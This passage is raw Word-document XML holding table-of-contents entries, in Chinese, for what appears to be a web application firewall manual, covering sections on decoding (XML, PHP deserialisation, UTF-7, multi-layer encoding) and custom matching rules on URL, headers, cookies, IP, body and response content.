              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>4.2.6 XML解析</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1825822809 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>20</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="5732B87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_Toc1210118880 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>4.2.7 PHP反序列化对象解析</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1210118880 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>20</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="3A53A239">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_Toc1797879070 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>4.2.8 UTF</w:t>
          </w:r>
          <w:r>
            <w:t>-7</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>解码</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1797879070 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>21</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="467196D1">
          <w:pPr>
            <w:pStyle w:val="13"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9026"/>
              <w:tab w:val="clear" w:pos="15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_Toc1858616200 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>4.2.9 多层编码解析</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1858616200 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>21</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="58D7F093">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_Toc465344138 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>5 自定义规则</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc465344138 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>22</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="79D06C06">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_Toc2050968639 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>5.1 URL匹配</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc2050968639 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>22</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="6D436006">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_Toc1369897676 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>5.2 路径匹配</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1369897676 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>22</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="329F3028">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_Toc698061045 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>5.3 Query匹配</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc698061045 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>23</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="70A75DC4">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_Toc608819754 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>5.4 请求方法匹配</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc608819754 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>24</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="5ECB5B01">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_Toc1821511170 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>5.5 Host匹配</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1821511170 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>24</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="251A908F">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_Toc1758846205 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>5.6 Cookie匹配</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1758846205 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>25</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="0376DF53">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_Toc815766480 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>5.7 User</w:t>
          </w:r>
          <w:r>
            <w:t>-</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>Agent匹配</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc815766480 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>25</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="2147A3B1">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_Toc1051626912 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>5.8 Refer</w:t>
          </w:r>
          <w:r>
            <w:t>r</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>er匹配</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1051626912 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>26</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="13A2C066">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_Toc903095174 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>5.9 Content</w:t>
          </w:r>
          <w:r>
            <w:t>-</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>Type匹配</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc903095174 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>27</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="694C8960">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_Toc2053656069 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>5.10 IP匹配</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc2053656069 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>27</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="77E32872">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_Toc1440377099 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>5.11 X-Forwarded-For匹配</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1440377099 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>28</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="5438A30A">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_Toc1982233909 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>5.12 Origin匹配</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1982233909 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>28</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="070A5530">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_Toc1491492652 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>5.13 Session匹配</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1491492652 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>29</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="59D35C1E">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_Toc2087874380 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>5.14 Header匹配</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc2087874380 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>30</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="099A6CF2">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_Toc1021912680 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>5.15 请求头长度匹配</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1021912680 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>30</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="5B9BC295">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_Toc1859687701 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>5.16 Body匹配</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1859687701 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>31</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="1358DB5A">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_Toc1294192269 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>5.17 POST参数匹配</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1294192269 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>31</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="11D30BCA">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_Toc1775088267 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>5.18 上传文件名匹配</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1775088267 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>32</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="04D9A6C7">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_Toc1065679345 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>5.19 HTTP状态码匹配</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1065679345 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>32</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="1C262869">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_Toc859135435 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>5.20 响应内容匹配</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc859135435 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>33</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
